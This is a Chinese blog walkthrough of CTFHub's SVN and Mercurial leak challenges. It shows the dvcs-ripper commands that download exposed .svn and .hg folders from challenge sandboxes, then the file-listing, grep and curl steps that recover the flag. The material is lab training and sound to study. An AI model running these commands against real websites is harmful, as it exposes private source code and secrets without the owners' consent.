CTFHUB-信息泄露-SVN泄露和HG泄露

最新推荐文章于 2024-06-07 21:36:31 发布
最新推荐文章于 2024-06-07 21:36:31 发布
阅读量481 收藏 5
点赞数 12
分类专栏: CTFHUB技能树 文章标签: svn linux 测试工具 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/139268466
版权

目录

SYN泄露

方法1

方法2

HG泄露

这两关我们需要用到一个泄露利用工具 dvcs-riCpperPerl环境,没有的就去下载,kali没有自带

SYN泄露

当开发人员使用 SVN 进行版本控制,对站点自动部署。如果配置不当,可能会将.svn文件夹直接部署到线上环境。这就引起了 SVN 泄露漏洞。

因为要找到旧版本的源代码,则是找到pristine文件。

首先到dvcs-ripper目录下

cd dvcs-ripper

这时需要用到工具需要的依赖库,不然后面找不到flag,没有就下载安装一下

sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl

使用dvcs-ripper工具扫描将泄露的文件下载到本地目录中

./rip-svn.pl -u http://challenge-406a6acb9c5e31dc.sandbox.ctfhub.com:10800/.svn

方法1

#查看文件
ls -al

进入 .svn 文件
cd .svn

进入 pristine
cd pristine

在pristine发现两个目录,查看第一个文件,发现没有flag

再查看第二个,发现了flag

方法2

使用dvcs-ripper工具之后直接使用tree命令,没有tree命令的直接下载

sudo apt-get install tree
tree .svn

使用 cat 命令挨个查看这两个 .svn-base 文件

HG泄露

当开发人员使用 Mercurial 进行版本控制,对站点自动部署。如果配置不当,可能会将.hg 文件夹直接部署到线上环境。这就引起了 hg 泄露漏洞。

使用dvcs-ripper工具的 rip-hg.pl 模块下载泄露的文件

./rip-hg.pl -u http://challenge-31d3220274a39dc4.sandbox.ctfhub.com:10800/.hg

发现提示404报错和两处完成,可能是没有完整下载网站目录

使用tree命令列出刚刚下载的.hg网站目录,发现可疑的文本文件

tree .hg

查看可疑的文本文件是否存在flag,发现历史版本add flag

cat .hg/last-message.txt

发现历史版本可以使用正则表达式进行关键字查找

grep -a -r flag

使用curl命令检查一下data数据中的文本文件,发现了flag

curl http://challenge-31d3220274a39dc4.sandbox.ctfhub.com:10800/flag_1413026015.txt

燕雀安知鸿鹄之志哉.
关注
  • 12
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Seay-Svn源代码泄露漏洞扫描工具
07-08
“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏...
TortoiseSVN-1.14.0.28885-x64-svn-1.14.0
11-15
《TortoiseSVN-1.14.0.28885-x64-svn-1.14.0及其简体中文语言包详解》 TortoiseSVN,一个深受开发者喜爱的版本控制系统客户端,是Subversion(SVN)在Windows平台上的图形化界面。版本号为1.14.0.28885的x64位版本...
CTFHub:web前置技能-信息泄露-SVN泄露
wdnmddbl的博客
06-07 885
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点链接:dvcs-ripper下载点我链接:svnExploit下载点我大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
CTF-SVN泄露
diven2的博客
08-03 306
CTF-SVN泄露 首先是环境搭建DVCS-ripper需要在perl环境中才能运行,因为他是使用perl语言编写的。就像.py文件必须在python环境中运行一样。perl是一种面向对象的服务器语言就和C语言一样都是高级语言。 然后是kali中perl环境安装的代码在命令行中输入 sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl
CTFHub Web 信息泄露 hg泄露
m0_51319369的博客
04-30 308
dirsearch 扫描发现/.hg/store/undo 直接访问,在window下载了一个名为“undo”的文件,发现可以直接打开,里面有个.txt,直接访问,找到了flag 另一种解法,跟svn泄露一样的做法 在工具dvcs-ripper目录下 ./rip-hg.pl -v -u http://challenge-5d8c4aae796c77ee.sandbox.ctfhub.com:10800/.hg/ ls -all 查看目录,发现果然有.hg目录 cd +目录名,进入.hg目录,(省略了
CTFHub:web前置技能-信息泄露-HG泄露
最新发布
wdnmddbl的博客
06-07 359
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)思路:文章很详细。
ctfhubsvn信息泄露
tempulcc的博客
10-08 5071
ctfhubsvn信息泄露1、漏洞形成原理1)什么是SVN?2)漏洞成因3)漏洞修复2、ctf实战1)配置工具环境2)恢复.svn3)进入.svn目录,查找flag 1、漏洞形成原理 1)什么是SVN? SVN是subversion的缩写,是一个开放源代码的版本控制系统,通过采用分支管理系统的高效管理,简而言之就是用于多个人共同开发同一个项目,实现共享资源,实现最终集中式的管理。 2)漏洞成因 在服务器上布署代码时。如果是使用 svn checkout 功能来更新代码,而没有配置好目录访问权限,则会存在此
SVN-SourceAnywhere-Bridge:SVN SourceAnywhere 桥接
06-07
SVN SourceAnywhere 桥接 利用 SVNBridge 从 ... SourceAnywhere SVNBridge 基于 TFS SVNBridge 库开发,将 SourceAnywhere 和 SVN 链接起来,使开发者可以从 TortoiseSVN 访问 SourceAnywhere 数据库。 博客 。
Seay-Svn源代码泄露漏洞利用工具1.0+2.0.zip
03-24
“在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息。但一些网站管理员在发布代码时,不愿意使用‘导出’功能,而是直接复制代码文件夹到WEB服务器上,这就使.svn隐藏...
Seay-Svn源代码泄露漏洞扫描工具.zip
03-01
Seay-Svn源代码泄露漏洞扫描工具是一款专为开发者和安全人员设计的工具,用于检测SVN(Subversion)版本控制系统中的源代码泄露问题。在软件开发过程中,SVN是常用的版本控制工具,它帮助团队协作管理代码版本,但...
CTFhub中的svn泄露
weixin_46954909的博客
02-18 420
使用的工具:1.SVNExploit(本题不推荐使用)如需要可私信我。
CTFHub | SVN泄露
尼泊罗河伯的博客
10-13 4930
此题使用 kali-linux 系统完成,因为使用 windows 系统环境使用 Perl 配置环境变量过于繁琐,且 Perl 更适合在 Linux 环境中使用。在做这题碰到的坑还挺多,一开始尝试了使用各种 SVN 泄露漏洞利用工具,最后发现 dvcs-ripper 这个工具比较好用。配置好工具及环境后,使用工具将泄露文件 clone 到本地目录下,最后通过检索文件发现 6e 文件中的文件存放此题 flag 。
CTFHUb--SVN泄露
m0_73605862的博客
07-23 482
然后进入这个.svn文件,一直进入直到看到pristine文件(存放旧服务器源代码的文件)然后尝试进入文件 ,结果第一个就是flag。首先到dvcs-ripper目录下进行使用rip-svn.pl,然后输入。1.因为要找到旧版本的源代码,则是找到pristine文件。查看该目录下的所有文件,可以看到一个后缀为.svn的隐藏文件。
CTFHub-Web-信息泄露-SVN泄露
qq_54037445的博客
11-19 724
CTFHub-信息泄露-SVN泄露
Mercurial基本操作
yy490146739的专栏
03-28 470
Init是指初始化,也就是创建一个空的仓库 Clone是指创建仓库的复本,创建的来源可以是一个http或ssh链接表示的仓库,也可以是本地仓库 Commit是指提交,即接受所有的改动,将当前版本作为最新版本(也叫tip)。注意这个提交和集中式SCM不同,它只提交的本地仓库,而且本地仓库会 详细记录所有的变动(称为变更集或改动集)。因此不用客气,多提交几次也没关系,因为不影响别人的仓库。
SVN泄露ctfhub
2401_82985722的博客
04-15 1216
SVN详解_svn cp-CSDN博客subvert(颠覆) + verson(版本) = subversion --> svnSVN(Subversion)是一种开放源代码版本控制系统,用于管理项目的文件和代码。
CTFHUBSVN泄露HG泄露
m0_56988395的博客
03-03 5561
目录 1、SVN泄露 2、HG泄露 1、SVN泄露 其实我们应该先用dirsearch先扫的,这才是一个完整的流程,但是我们这里直接根据提示来,这里利用一款的perl版本控制软件信息泄露利用工具,叫dvcs-ripper,支持SVN, GIT, Mercurial/hg, bz等等,工具直接上github上搜,基本都是有的。 这里提示是svn泄露,所以我们使用rip-svn.pl模块 perl ./rip-svn.pl -v -u http://challenge-609b.
CTFHub 信息泄露
qq_58879949的博客
09-06 995
手动遍历。
svn propdel --revprop -r0 svn:rdump-lock svn://127.0.0.1
03-19
svn propdel --revprop -r0 svn:rdump-lock svn://127.0.0.1 是一个用于删除 Subversion(SVN)版本控制系统中的版本属性的命令。具体来说,它用于删除指定版本(-r0)的 svn:rdump-lock 属性。 svn:rdump-lock 属性是用于锁定 Subversion 仓库的属性之一。当使用 svnadmin dump 命令备份或导出仓库时,会自动创建该属性。该属性的作用是防止在备份或导出过程中对仓库进行修改。 通过执行 svn propdel --revprop -r0 svn:rdump-lock svn://127.0.0.1 命令,可以删除指定版本的 svn:rdump-lock 属性,允许对该版本进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值